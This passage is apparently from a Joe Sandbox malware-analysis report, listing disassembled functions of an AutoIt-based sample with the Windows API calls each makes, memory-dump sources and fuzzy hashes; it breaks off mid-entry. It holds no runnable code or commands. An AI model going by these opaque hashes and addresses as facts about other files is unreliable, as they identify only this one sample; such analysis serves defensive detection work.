                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                          • String ID:
                          • API String ID: 1687444384-0
                          • Opcode ID: 85a570d7593165e866d0f5aa28d7d1661ece979e985dc47e50947bbdf002078f
                          • Instruction ID: 48db0f960a30a541b558b4a70932ed9d1d4c63fc13711453f6f0d0d2a07bbf9c
                          • Opcode Fuzzy Hash: 85a570d7593165e866d0f5aa28d7d1661ece979e985dc47e50947bbdf002078f
                          • Instruction Fuzzy Hash: A8016D72451B10DFD720EF65E805759B7E0EF40325F20898EE4AA872B0CFB0AA40CB05
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6E13E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00B6E14D
                          • _memset.LIBCMT ref: 00B6E15C
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00BC3EE0,00BC3F24), ref: 00B6E18B
                          • CloseHandle.KERNEL32 ref: 00B6E19D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memset$CloseCreateHandleProcess
                          • String ID:
                          • API String ID: 3277943733-0
                          • Opcode ID: 50586644eebbd6828de0591fd70af92de7f793faf26cbf6ba6f6c65ef4f0bfd6
                          • Instruction ID: 07ba0b0c4163248f771f66691b596f42a9afa463b9352633f0a4bbf0cfc9afae
                          • Opcode Fuzzy Hash: 50586644eebbd6828de0591fd70af92de7f793faf26cbf6ba6f6c65ef4f0bfd6
                          • Instruction Fuzzy Hash: EDF0E9F1940311BFF3106B25AC45FB77AECDB09B54F408825BA08D71A1DBB68E0187B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B49C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                          Download Yara Rule
                          APIs
                          • RtlEnterCriticalSection.NTDLL(?), ref: 00B49C7F
                            • Part of subcall function 00B4AD14: _memset.LIBCMT ref: 00B4AD49
                          • _memmove.LIBCMT ref: 00B49CA2
                          • _memset.LIBCMT ref: 00B49CAF
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00B49CBF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CriticalSection_memset$EnterLeave_memmove
                          • String ID:
                          • API String ID: 48991266-0
                          • Opcode ID: a915adacc8c43cd32f3e2ef0698402fdb454a07215c6ccf6ca889bea67548c13
                          • Instruction ID: 810da3e0b91f5b9ddfb63babdd5f1f9cddd58efb82bedaddf78cc6608838637b
                          • Opcode Fuzzy Hash: a915adacc8c43cd32f3e2ef0698402fdb454a07215c6ccf6ca889bea67548c13
                          • Instruction Fuzzy Hash: 11F05476200010ABCF016F54EC85E9ABB69EF45310F04C0A2FE085F267C735E911DBB5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6E83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00B1B5EB
                            • Part of subcall function 00B1B58B: SelectObject.GDI32(?,00000000), ref: 00B1B5FA
                            • Part of subcall function 00B1B58B: BeginPath.GDI32(?), ref: 00B1B611
                            • Part of subcall function 00B1B58B: SelectObject.GDI32(?,00000000), ref: 00B1B63B
                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B6E860
                          • LineTo.GDI32(00000000,?,?), ref: 00B6E86D
                          • EndPath.GDI32(00000000), ref: 00B6E87D
                          • StrokePath.GDI32(00000000), ref: 00B6E88B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                          • String ID:
                          • API String ID: 1539411459-0
                          • Opcode ID: 4caf099fe9c74047ce1ae50b01e818daa2d579de90d4b6348ea4d4e750488a42
                          • Instruction ID: c0401595ee00cdc6ef30a7b0f00109902baed023d01905e760163e5d71918068
                          • Opcode Fuzzy Hash: 4caf099fe9c74047ce1ae50b01e818daa2d579de90d4b6348ea4d4e750488a42
                          • Instruction Fuzzy Hash: 4EF0BE31004259BADB122F58AC0DFCA3F9AAF0A310F008142FA11660F18B798551CF95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3D623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B3D640
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B3D653
                          • GetCurrentThreadId.KERNEL32 ref: 00B3D65A
                          • AttachThreadInput.USER32(00000000), ref: 00B3D661
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                          • String ID:
                          • API String ID: 2710830443-0
                          • Opcode ID: 845a207904d74917e7b6d090b013509defb2a3ab57f9b293d55166c387a2c4b2
                          • Instruction ID: e802e465dcc0053f01709794c3dc76ca690a8f74cccef382d07aa1d66c383d00
                          • Opcode Fuzzy Hash: 845a207904d74917e7b6d090b013509defb2a3ab57f9b293d55166c387a2c4b2
                          • Instruction Fuzzy Hash: DEE0ED71541228BADB205FA2EC0EEDB7F6CEF567B1F408052B61D960A0DA75D580CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3BDF8 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThread.KERNEL32 ref: 00B3BE01
                          • OpenThreadToken.ADVAPI32(00000000), ref: 00B3BE08
                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00B3BE15
                          • OpenProcessToken.ADVAPI32(00000000), ref: 00B3BE1C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CurrentOpenProcessThreadToken
                          • String ID:
                          • API String ID: 3974789173-0
                          • Opcode ID: 14f18e79a818b1c5d9d108bde5e2af03877cb5eae9432cdf70c2e036d8393c34
                          • Instruction ID: fabed7d8ff38b51f7f1bcb6d2e029db0b0dad666750ff18f86cdfe36db15c3e6
                          • Opcode Fuzzy Hash: 14f18e79a818b1c5d9d108bde5e2af03877cb5eae9432cdf70c2e036d8393c34
                          • Instruction Fuzzy Hash: 49E04F326412219BD7102FB59C0CF973BA8EF58792F108819F241DB0A0DA248441C765
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1B0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                          • GetSysColor.USER32(00000008), ref: 00B1B0C5
                          • SetTextColor.GDI32(?,000000FF), ref: 00B1B0CF
                          • SetBkMode.GDI32(?,00000001), ref: 00B1B0E4
                          • GetStockObject.GDI32(00000005), ref: 00B1B0EC
                          • GetWindowDC.USER32(?,00000000), ref: 00B7ECFA
                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B7ED07
                          • GetPixel.GDI32(00000000,?,00000000), ref: 00B7ED20
                          • GetPixel.GDI32(00000000,00000000,?), ref: 00B7ED39
                          • GetPixel.GDI32(00000000,?,?), ref: 00B7ED59
                          • ReleaseDC.USER32(?,00000000), ref: 00B7ED64
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                          • String ID:
                          • API String ID: 1946975507-0
                          • Opcode ID: 5aec9e306156a92c1b6927747536f366992f210da687576a7d39674f928603b7
                          • Instruction ID: 10f67c47d1d6109ee387ed4c6b07d4b8fbdfd988c60b87b7e9bf569c12773f25
                          • Opcode Fuzzy Hash: 5aec9e306156a92c1b6927747536f366992f210da687576a7d39674f928603b7
                          • Instruction Fuzzy Hash: A1E0C931500240AAEB216B74AC4DBD83B61EF55335F14C2A6F679690F2CB718980DB11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3EAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                          Download Yara Rule
                          APIs
                          • OleSetContainedObject.OLE32(?,00000001), ref: 00B3ECA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ContainedObject
                          • String ID: AutoIt3GUI$Container
                          • API String ID: 3565006973-3941886329
                          • Opcode ID: c29c4af5a20fb6f84660baa213aff0254d2cd809aa59cf9d90cdcca663b739e9
                          • Instruction ID: 3bf93e0a2da07a8173f23a07d458539a7b47c8b1c9c8a4b9c12082ccf4a86d0e
                          • Opcode Fuzzy Hash: c29c4af5a20fb6f84660baa213aff0254d2cd809aa59cf9d90cdcca663b739e9
                          • Instruction Fuzzy Hash: DA913874600701DFDB14DF64C884A6ABBE5FF48710F2485AEF95ADB291EBB0E841CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5C604 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 232COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B3A857: lstrcmpiW.KERNEL32(?,00000000), ref: 00B3A89D
                          • _memset.LIBCMT ref: 00B5C6BA
                          • _memset.LIBCMT ref: 00B5C7D8
                          Strings
                          • NULL Pointer assignment, xrefs: 00B5C85D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memset$lstrcmpi
                          • String ID: NULL Pointer assignment
                          • API String ID: 1020867613-2785691316
                          • Opcode ID: 382abd14b09d6deb856e5308e9b5f51377da17ff150fb2dab5f8d74019f8dfcf
                          • Instruction ID: 2e7318dd9fe961e540c33815a66a37a8e298788fe28b9b2d3ccf6d3fdf42fda6
                          • Opcode Fuzzy Hash: 382abd14b09d6deb856e5308e9b5f51377da17ff150fb2dab5f8d74019f8dfcf
                          • Instruction Fuzzy Hash: 24910971D00218AFDB10DFA4DC85EEEBBB9EF08750F20459AF919A7291DB705A45CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4E704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B03BCF: _wcscpy.LIBCMT ref: 00B03BF2
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                          • __wcsnicmp.LIBCMT ref: 00B4E785
                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00B4E84E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                          • String ID: LPT
                          • API String ID: 3222508074-1350329615
                          • Opcode ID: 552fff38e94cbbb3f1566a961b2c81cec0ee8eb3a298f1c15678634283ed740a
                          • Instruction ID: a38730cbe1840ea6e2a264e5161ab0e0f6b3352ef1bd18553e42880579cfc260
                          • Opcode Fuzzy Hash: 552fff38e94cbbb3f1566a961b2c81cec0ee8eb3a298f1c15678634283ed740a
                          • Instruction Fuzzy Hash: 80613A75A00215AFCF14EB94C895EAEBBF8FB08310F1541A9F556AB291DB70EF409B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B01B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNEL32(00000000), ref: 00B01B83
                          • GlobalMemoryStatusEx.KERNEL32 ref: 00B01B9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: GlobalMemorySleepStatus
                          • String ID: @
                          • API String ID: 2783356886-2766056989
                          • Opcode ID: 34b2fafd76d98f56aa18b0ea3bfaa142c39e38c48685f21ad569566520c45a49
                          • Instruction ID: cf12a12e2280fa94450b34dc799ef6fe83458ea59830ad2315a92378998fc5d5
                          • Opcode Fuzzy Hash: 34b2fafd76d98f56aa18b0ea3bfaa142c39e38c48685f21ad569566520c45a49
                          • Instruction Fuzzy Hash: CF513C714087449BE320AF14D885BABBBECFF95354F81488DF1C8420A5EF7199ACC756
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4CE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0417D: __fread_nolock.LIBCMT ref: 00B0419B
                          • _wcscmp.LIBCMT ref: 00B4CF49
                          • _wcscmp.LIBCMT ref: 00B4CF5C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscmp$__fread_nolock
                          • String ID: FILE
                          • API String ID: 4029003684-3121273764
                          • Opcode ID: b201bb42cfe8da23cb4ada073a39c35e12ba71617215c10ec9e81bc93b56e4db
                          • Instruction ID: 495455a38bc614cff35595b17f03128dd2dac8cc7d7fc9250b3b566fc758d49e
                          • Opcode Fuzzy Hash: b201bb42cfe8da23cb4ada073a39c35e12ba71617215c10ec9e81bc93b56e4db
                          • Instruction Fuzzy Hash: 4241B172A00219BADF109BA4DC81FEF7FFAEF49B10F0004A9F605BA191D7719A489B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6A578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00B6A668
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B6A67D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: '
                          • API String ID: 3850602802-1997036262
                          • Opcode ID: 35155d4516f4dd87a25359486d06d331cf40ae6555cb226a36a093fb9b26c35d
                          • Instruction ID: 50451e2306a8d078f4e8f61689ee461971e8178d6eab8cfd4194b65eb95d91dc
                          • Opcode Fuzzy Hash: 35155d4516f4dd87a25359486d06d331cf40ae6555cb226a36a093fb9b26c35d
                          • Instruction Fuzzy Hash: 21410775A002099FDF14CF68D880BDA7BF9FB09300F1444AAE909EB381D774A941CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B557D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00B557E7
                          • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00B5581D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CrackInternet_memset
                          • String ID: |
                          • API String ID: 1413715105-2343686810
                          • Opcode ID: d3e789bb88379a71799c52509a0226b6e814d2d715278c6946472503c3d3d64c
                          • Instruction ID: af19135b9bbeb69bc867170ffeb8488b76bd1164e2f02cc4315c256df40dd2de
                          • Opcode Fuzzy Hash: d3e789bb88379a71799c52509a0226b6e814d2d715278c6946472503c3d3d64c
                          • Instruction Fuzzy Hash: AF313D71900119EBDF11AFA0DC95EEE7FF8FF18301F104095F815A6161EB315A4ACB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B69567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(?,?,?,?), ref: 00B6961B
                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B69657
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$DestroyMove
                          • String ID: static
                          • API String ID: 2139405536-2160076837
                          • Opcode ID: 4e6ad2af1362d3ed03494ceb75ebecb27ffa22b3acb0dc7c30226a4c7c43ee56
                          • Instruction ID: 06228b58ce2dfcde463b1a27c85624530f7785683e39c9eb3bf603533611713e
                          • Opcode Fuzzy Hash: 4e6ad2af1362d3ed03494ceb75ebecb27ffa22b3acb0dc7c30226a4c7c43ee56
